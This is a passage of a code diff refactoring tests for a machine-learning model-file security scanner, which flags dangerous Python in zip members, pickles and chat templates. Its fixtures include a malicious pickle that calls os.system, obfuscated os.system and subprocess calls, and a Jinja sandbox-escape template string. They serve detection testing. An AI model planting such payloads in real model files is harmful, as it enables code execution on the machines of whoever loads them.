test_scan_zip_ignores_benign_namespace_mapping_call(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe(tmp_path, source) def test_scan_zip_flags_inert_libraryloader_dlltype_mapping_rebound(tmp_path: Path) -> None: @@ -3880,17 +3071,7 @@ def test_scan_zip_flags_inert_libraryloader_dlltype_mapping_rebound(tmp_path: Pa source = ( "import ctypes\nloader = ctypes.LibraryLoader(len)\nloader.__dict__['_dlltype'] = ctypes.CDLL\nloader.payload\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S110") @pytest.mark.parametrize( @@ -4136,31 +3317,13 @@ def test_scan_zip_flags_inert_libraryloader_dlltype_mapping_rebound(tmp_path: Pa ], ) def test_scan_zip_flags_rebound_safe_proof_execution(tmp_path: Path, source: str, rule_code: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == rule_code - for check in result.checks - ) + _assert_zip_python_rule(tmp_path, source, rule_code) def test_scan_zip_ignores_shadowed_namespace_mapping_helper(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import os\nvars = lambda _: {'system': print}\nvars(os)['system']('safe')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) @pytest.mark.parametrize( @@ -4178,33 +3341,13 @@ def test_scan_zip_ignores_shadowed_namespace_mapping_helper(tmp_path: Path) -> N ], ) def test_scan_zip_flags_implicit_builtins_mapping_dangerous_python_member(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S104" - assert python_checks[0].details["reason"] == "high-risk calls: builtins.eval" + _assert_zip_builtin_eval_rule(tmp_path, source) def test_scan_zip_ignores_shadowed_implicit_builtins_mapping(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "__builtins__ = {'eval': print}\n__builtins__['eval']('safe')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) @pytest.mark.parametrize( @@ -4255,20 +3398,7 @@ def test_scan_zip_ignores_shadowed_implicit_builtins_mapping(tmp_path: Path) -> ], ) def test_scan_zip_flags_globals_builtins_mapping_dangerous_python_member(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S104" - assert python_checks[0].details["reason"] == "high-risk calls: builtins.eval" + _assert_zip_builtin_eval_rule(tmp_path, source) @pytest.mark.parametrize( @@ -4297,15 +3427,7 @@ def test_scan_zip_flags_globals_builtins_mapping_dangerous_python_member(tmp_pat ], ) def test_scan_zip_ignores_shadowed_globals_builtins_mapping(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe(tmp_path, source) @pytest.mark.parametrize( @@ -4341,41 +3463,19 @@ def test_scan_zip_ignores_shadowed_globals_builtins_mapping(tmp_path: Path, sour ], ) def test_scan_zip_ignores_non_module_local_mappings(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe(tmp_path, source) def test_scan_zip_ignores_conditionally_bound_local_namespace_without_global_fallback(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "def run(flag, safe):\n if flag:\n os = safe\n os.system('safe')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_ignores_conditionally_bound_local_builtins_without_global_fallback(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "def run(flag):\n if flag:\n __builtins__ = {'eval': print}\n __builtins__['eval']('safe')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) @pytest.mark.parametrize( @@ -4412,10 +3512,7 @@ def test_scan_zip_ignores_conditionally_bound_local_builtins_without_global_fall ) def test_scan_zip_flags_namespace_member_rebound_to_dangerous_callable(tmp_path: Path, source: str) -> None: archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") assert any( check.name == "Python Archive Member Security" @@ -4429,24 +3526,14 @@ def test_scan_zip_bounds_large_concatenated_getattr_names(tmp_path: Path) -> Non archive_path = tmp_path / "model_bundle.zip" padding = " + ".join(["''"] * 300) source = f"import os\ngetattr(os, 'sys' + {padding} + 'tem')('echo hidden')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_flags_padded_split_literal_getattr_name(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" padding = " + ".join(["''"] * 160) source = f"import os\ngetattr(os, 'sys' + {padding} + 'tem')('echo hidden')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") assert any( check.name == "Python Archive Member Security" @@ -4457,105 +3544,53 @@ def test_scan_zip_flags_padded_split_literal_getattr_name(tmp_path: Path) -> Non def test_scan_zip_flags_rebound_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import subprocess\nrunner = subprocess.run\nrunner(['echo', 'hidden'], check=False)\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + _assert_zip_subprocess_warning( + tmp_path, ("import subprocess\nrunner = subprocess.run\nrunner(['echo', 'hidden'], check=False)\n") + ) def test_scan_zip_flags_default_rebound_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import subprocess\ndef handler(runner=subprocess.run) -> None:\n runner(['echo', 'hidden'], check=False)\n" + _assert_zip_subprocess_warning( + tmp_path, + ( + "import subprocess\ndef handler(runner=subprocess.run) -> None:\n" + " runner(['echo', 'hidden'], check=False)\n" + ), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" def test_scan_zip_import_aliases_are_scoped_per_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import subprocess\n" - "def helper() -> str:\n" - " import os as subprocess\n" - " return subprocess.getcwd()\n" - "def handler() -> None:\n" - " subprocess.run(['echo', 'hidden'], check=False)\n" + _assert_zip_member_subprocess_call( + tmp_path, + ( + "import subprocess\n" + "def helper() -> str:\n" + " import os as subprocess\n" + " return subprocess.getcwd()\n" + "def handler() -> None:\n" + " subprocess.run(['echo', 'hidden'], check=False)\n" + ), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" def test_scan_zip_method_does_not_capture_class_attribute_alias(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import subprocess\n" - "class Handler:\n" - " subprocess = None\n" - " def run(self) -> None:\n" - " subprocess.run(['echo', 'hidden'], check=False)\n" + _assert_zip_member_subprocess_call( + tmp_path, + ( + "import subprocess\n" + "class Handler:\n" + " subprocess = None\n" + " def run(self) -> None:\n" + " subprocess.run(['echo', 'hidden'], check=False)\n" + ), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" def test_scan_zip_empty_loop_target_does_not_hide_later_dangerous_call(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import subprocess\nfor subprocess in ():\n pass\nsubprocess.run(['echo', 'hidden'], check=False)\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + _assert_zip_member_subprocess_call( + tmp_path, + ("import subprocess\nfor subprocess in ():\n pass\nsubprocess.run(['echo', 'hidden'], check=False)\n"), + ) def test_eager_generator_consumer_applies_safe_module_member_overwrite() -> None: @@ -4592,101 +3627,56 @@ def test_generator_consumer_does_not_apply_skipped_module_member_overwrite(consu def test_scan_zip_nonempty_loop_target_shadows_dangerous_import(tmp_path: Path) -> None: - archive_path = tmp_path / "source_bundle.zip" - source = "import subprocess\nfor subprocess in (object(),):\n pass\nsubprocess.run()\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("preprocess.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert result.success is True - assert not any(check.name == "Python Archive Member Security" for check in result.checks) - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_zip_shadowed_import( + tmp_path, ("import subprocess\nfor subprocess in (object(),):\n pass\nsubprocess.run()\n") + ) def test_scan_zip_conditional_target_does_not_hide_later_dangerous_call(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import subprocess\nif False:\n subprocess = None\nsubprocess.run(['echo', 'hidden'], check=False)\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + _assert_zip_member_subprocess_call( + tmp_path, + ("import subprocess\nif False:\n subprocess = None\nsubprocess.run(['echo', 'hidden'], check=False)\n"), + ) def test_scan_zip_conditional_aliases_preserve_dangerous_branch(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "if __name__:\n" - " import subprocess as sp\n" - "else:\n" - " import os as sp\n" - "sp.run(['echo', 'hidden'], check=False)\n" + _assert_zip_member_subprocess_call( + tmp_path, + ( + "if __name__:\n" + " import subprocess as sp\n" + "else:\n" + " import os as sp\n" + "sp.run(['echo', 'hidden'], check=False)\n" + ), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" def test_scan_zip_loop_body_alias_survives_to_later_dangerous_call(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "for _ in (1,):\n import subprocess as sp\nsp.run(['echo', 'hidden'], check=False)\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + _assert_zip_member_subprocess_call( + tmp_path, ("for _ in (1,):\n import subprocess as sp\nsp.run(['echo', 'hidden'], check=False)\n") + ) def test_scan_zip_ignores_shadowed_dangerous_import_name(tmp_path: Path) -> None: - archive_path = tmp_path / "source_bundle.zip" - source = ( - "import subprocess\n" - "class Runner:\n" - " def run(self) -> str:\n" - " return 'ok'\n" - "subprocess = Runner()\n" - "subprocess.run()\n" + _assert_zip_shadowed_import( + tmp_path, + ( + "import subprocess\n" + "class Runner:\n" + " def run(self) -> str:\n" + " return 'ok'\n" + "subprocess = Runner()\n" + "subprocess.run()\n" + ), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("preprocess.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert result.success is True - assert not any(check.name == "Python Archive Member Security" for check in result.checks) - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) def test_scan_zip_ignores_benign_python_member(tmp_path: Path) -> None: archive_path = tmp_path / "source_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("preprocess.py", "def normalize(value: float) -> float:\n return value / 255.0\n") - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member( + archive_path, "def normalize(value: float) -> float:\n return value / 255.0\n", "preprocess.py" + ) assert result.success is True assert not any(check.name == "Python Archive Member Security" for check in result.checks) @@ -4695,10 +3685,7 @@ def test_scan_zip_ignores_benign_python_member(tmp_path: Path) -> None: def test_scan_zip_marks_malformed_python_member_incomplete(tmp_path: Path) -> None: archive_path = tmp_path / "source_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", "def handler(:\n pass\n") - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, "def handler(:\n pass\n", "handler.py") assert result.success is False assert result.metadata["analysis_incomplete"] is True @@ -4770,26 +3757,12 @@ def test_scan_npz_flags_extensionless_executable_member(tmp_path: Path) -> None: def test_scan_npz_ignores_extensionless_executable_near_match(tmp_path: Path) -> None: """Near-match member bytes should not become executable findings.""" - archive_path = tmp_path / "model_bundle.npz" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("arrays.npy", _npy_payload()) - archive.writestr("bin/runme", b"\x7fELG" + b"\x00" * 64) - - result = ZipScanner().scan(str(archive_path)) - - assert not any(check.name == "Executable Archive Member Detection" for check in result.checks) + _assert_executable_near_match(tmp_path, ("bin/runme"), (b"\x7fELG")) def test_scan_npz_ignores_java_class_header_near_match(tmp_path: Path) -> None: """Java class files should not be mistaken for Mach-O fat binaries.""" - archive_path = tmp_path / "model_bundle.npz" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("arrays.npy", _npy_payload()) - archive.writestr("Foo.class", b"\xca\xfe\xba\xbe\x00\x00\x00\x3d" + b"\x00" * 64) - - result = ZipScanner().scan(str(archive_path)) - - assert not any(check.name == "Executable Archive Member Detection" for check in result.checks) + _assert_executable_near_match(tmp_path, ("Foo.class"), (b"\xca\xfe\xba\xbe\x00\x00\x00\x3d")) def test_scan_npz_flags_extensionless_pe_member_with_late_header(tmp_path: Path) -> None: @@ -4873,22 +3846,16 @@ def test_scan_npz_ignores_numpy_member_near_python_suffix(tmp_path: Path) -> Non def test_scan_zip_ignores_benign_python_file_operations(tmp_path: Path) -> None: - archive_path = tmp_path / "source_bundle.zip" - source = ( - "from pathlib import Path\n" - "def load_config() -> tuple[str, str]:\n" - " left = open('config-a.json', encoding='utf-8').read()\n" - " right = open('config-b.json', encoding='utf-8').read()\n" - " return left, right\n" + _assert_zip_shadowed_import( + tmp_path, + ( + "from pathlib import Path\n" + "def load_config() -> tuple[str, str]:\n" + " left = open('config-a.json', encoding='utf-8').read()\n" + " right = open('config-b.json', encoding='utf-8').read()\n" + " return left, right\n" + ), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("preprocess.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert result.success is True - assert not any(check.name == "Python Archive Member Security" for check in result.checks) - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) @pytest.mark.parametrize( @@ -4909,10 +3876,7 @@ def test_scan_zip_python_member_emits_accurate_rule_code( ) -> None: """Each risk category must surface its own rule code (os.system as S101, etc.).""" archive_path = tmp_path / "source_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -5434,10 +4398,7 @@ def test_scan_zip_python_member_detects_operator_accessor_execution( tmp_path: Path, source: str, expected_rule_code: str, expected_call: str ) -> None: archive_path = tmp_path / "source_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -5469,26 +4430,14 @@ def test_scan_zip_python_member_detects_operator_accessor_execution( ], ) def test_scan_zip_python_member_ignores_benign_operator_accessor_names(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "source_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert result.success is True - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_shadowed_member_primitive(tmp_path, source, ("source_bundle.zip")) def test_scan_zip_python_member_emits_separate_check_per_rule_code(tmp_path: Path) -> None: """Mixed-risk source should yield one finding per rule code, sorted by code.""" archive_path = tmp_path / "source_bundle.zip" source = "import os\nimport subprocess\nos.system('echo a')\nsubprocess.run(['echo', 'b'], check=False)\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -5535,19 +4484,7 @@ def test_scan_zip_python_member_honors_pep263_encoding_declaration(tmp_path: Pat # would mangle it and could produce a SyntaxError. Passing bytes to # ast.parse directly lets Python honor the coding declaration. source = b"# -*- coding: latin-1 -*-\n# comment \xe9\nimport os\nos.system('echo hidden')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.system" + _assert_zip_python_finding_at_path(archive_path, source, "S101", "high-risk calls: os.system") class _HeaderRoutedTempScanner(BaseScanner): @@ -5726,14 +4663,7 @@ def test_executable_zip_composed_routing_fails_closed_when_subtype_scanner_unava ) archive.writestr("payload.pkl", b'cos\nsystem\n(S"echo pwned"\ntR.') - original_loader = _registry.load_scanner_by_id - - def load_scanner_by_id(scanner_id: str) -> type[BaseScanner] | None: - if scanner_id == "skops": - return None - return original_loader(scanner_id) - - monkeypatch.setattr(_registry, "load_scanner_by_id", load_scanner_by_id) + _disable_skops_scanner(monkeypatch) result = ScanResult(scanner_name="zip") archive_dispatch.merge_executable_zip_container_findings( @@ -5781,14 +4711,7 @@ def test_executable_zip_unavailable_subtype_fails_closed_and_is_not_cached( ) archive_path.write_bytes(b"\x7fELF" + b"\x00" * 60 + archive_path.read_bytes()) - original_loader = _registry.load_scanner_by_id - - def load_scanner_by_id(scanner_id: str) -> type[BaseScanner] | None: - if scanner_id == "skops": - return None - return original_loader(scanner_id) - - monkeypatch.setattr(_registry, "load_scanner_by_id", load_scanner_by_id) + _disable_skops_scanner(monkeypatch) _assert_inconclusive_zip_aggregate_not_cached( archive_path, @@ -5868,12 +4791,7 @@ def test_scan_nested_file_fails_closed_and_preserves_generic_keras_zip_findings( if malicious: archive.writestr("payload.pkl", b'cos\nsystem\n(S"echo pwned"\ntR.') - original_load_scanner = _registry._load_scanner - - def load_scanner_by_id(scanner_id: str) -> type[BaseScanner] | None: - if scanner_id == "keras_zip": - return None - return original_load_scanner(scanner_id) + load_scanner_by_id = without_keras_zip_scanner(_registry._load_scanner) monkeypatch.setattr(_registry, "_load_scanner", load_scanner_by_id) @@ -5900,12 +4818,7 @@ def test_scan_nested_file_reports_unavailable_keras_scanner_when_zip_fallback_is with zipfile.ZipFile(nested_keras, "w") as archive: archive.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}})) archive.writestr("metadata.json", json.dumps({"keras_version": "3.0.0"})) - original_load_scanner = _registry._load_scanner - - def load_scanner(scanner_id: str) -> type[BaseScanner] | None: - if scanner_id == "keras_zip": - return None - return original_load_scanner(scanner_id) + load_scanner = without_keras_zip_scanner(_registry._load_scanner) monkeypatch.setattr(_registry, "_load_scanner", load_scanner) @@ -5928,32 +4841,7 @@ def test_scan_nested_file_unavailable_keras_scanner_restores_whitelist_downgrade with zipfile.ZipFile(nested_keras, "w") as archive: archive.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}})) archive.writestr("metadata.json", json.dumps({"keras_version": "3.0.0"})) - original_load_scanner = _registry._load_scanner - - def load_scanner(scanner_id: str) -> type[BaseScanner] | None: - if scanner_id == "keras_zip": - return None - return original_load_scanner(scanner_id) - - def scan_with_whitelisted_finding(self: ZipScanner, path: str) -> ScanResult: - self.context = UnifiedMLContext( - file_path=Path(path), - file_size=Path(path).stat().st_size, - file_type=".keras", - model_id=next(iter(POPULAR_MODELS)), - model_source="huggingface", - ) - result = self._create_result() - result.add_check( - name="Fallback Security Finding", - passed=False, - message="High confidence fallback anomaly", - severity=IssueSeverity.CRITICAL, - rule_code="CUSTOM001", - ) - result.finish(success=True) - assert result.issues[0].severity == IssueSeverity.INFO - return result + load_scanner = without_keras_zip_scanner(_registry._load_scanner) monkeypatch.setattr(_registry, "_load_scanner", load_scanner) monkeypatch.setattr(ZipScanner, "scan", scan_with_whitelisted_finding) @@ -6726,66 +5614,21 @@ def test_zip_scan_preserves_skipped_scanner_ids_from_multiple_members(tmp_path: def test_scan_nested_file_xgboost_manifest_preserves_jinja_analysis(tmp_path: Path) -> None: - extracted_member = tmp_path / "config.json" - extracted_member.write_text( - '{"version":[1,7,4],"learner":{"gradient_booster":{}},' - '"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}"}', - encoding="utf-8", - ) - - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.scanner_name == "xgboost" - assert any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks - ) + _assert_xgboost_jinja_preserved(tmp_path, ("config.json")) def test_scan_nested_file_inconclusive_mxnet_config_preserves_jinja_analysis( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 256) - extracted_member = tmp_path / "config.json" - extracted_member.write_text( - '{"heads":[[0,0,0]],"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}","nodes":[{"attrs":"' - + ("x" * 300) - + '","op":"Custom","name":"load"}],"arg_nodes":[0]}', - encoding="utf-8", - ) - - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.success is False - assert "mxnet_symbol_routing_incomplete" in result.metadata["scan_outcome_reasons"] - assert any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks - ) + _assert_ambiguous_mxnet_jinja(tmp_path, monkeypatch, ("config.json")) def test_scan_nested_file_inconclusive_mxnet_tokenizer_config_preserves_direct_jinja_analysis( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 256) - extracted_member = tmp_path / "tokenizer_config.json" - extracted_member.write_text( - '{"heads":[[0,0,0]],"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}","nodes":[{"attrs":"' - + ("x" * 300) - + '","op":"Custom","name":"load"}],"arg_nodes":[0]}', - encoding="utf-8", - ) - - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.success is False - assert "mxnet_symbol_routing_incomplete" in result.metadata["scan_outcome_reasons"] - assert any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks - ) + _assert_ambiguous_mxnet_jinja(tmp_path, monkeypatch, ("tokenizer_config.json")) def test_scan_nested_file_inconclusive_mxnet_generation_config_runs_selected_jinja_when_manifest_excluded( @@ -6923,20 +5766,7 @@ def test_scan_nested_file_mxnet_routed_tokenizer_duplicate_override_preserves_di def test_scan_nested_file_xgboost_chat_template_preserves_direct_jinja_analysis(tmp_path: Path) -> None: - extracted_member = tmp_path / "chat_template.json" - extracted_member.write_text( - '{"version":[1,7,4],"learner":{"gradient_booster":{}},' - '"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}"}', - encoding="utf-8", - ) - - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.scanner_name == "xgboost" - assert any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks - ) + _assert_xgboost_jinja_preserved(tmp_path, ("chat_template.json")) def test_scan_nested_file_malformed_xgboost_chat_template_preserves_direct_jinja_analysis(tmp_path: Path) -> None: @@ -7291,29 +6121,11 @@ def test_scan_nested_file_generic_json_hint_before_value_budget_resolves_later_m def test_scan_nested_file_generic_array_heads_before_value_budget_without_mxnet_structure_uses_existing_owner( tmp_path: Path, ) -> None: - extracted_member = tmp_path / "config.json" - extracted_member.write_text( - '{"heads":["classification"],"padding":[' + ",".join("0" for _ in range(5000)) + "]}", - encoding="utf-8", - ) - - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.scanner_name == "manifest" - assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) + _assert_generic_json_owner(tmp_path, ('{"heads":["classification"],"padding":[')) def test_scan_nested_file_scalar_heads_generic_json_uses_existing_owner(tmp_path: Path) -> None: - extracted_member = tmp_path / "config.json" - extracted_member.write_text( - '{"heads":"main","padding":[' + ",".join("0" for _ in range(5000)) + "]}", - encoding="utf-8", - ) - - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.scanner_name == "manifest" - assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) + _assert_generic_json_owner(tmp_path, ('{"heads":"main","padding":[')) def test_scan_nested_file_generic_json_with_padded_node_object_fails_closed( @@ -7330,10 +6142,7 @@ def test_scan_nested_file_generic_json_with_padded_node_object_fails_closed( encoding="utf-8", ) - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.success is False - assert result.metadata["operational_error_reason"] == "mxnet_symbol_routing_incomplete" + _assert_nested_mxnet_routing_incomplete(extracted_member) @pytest.mark.parametrize("initial_nodes", ["[]", "null"]) @@ -7371,10 +6180,7 @@ def test_scan_nested_file_oversized_generic_json_with_lone_array_heads_fails_clo encoding="utf-8", ) - result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) - - assert result.success is False - assert result.metadata["operational_error_reason"] == "mxnet_symbol_routing_incomplete" + _assert_nested_mxnet_routing_incomplete(extracted_member) def 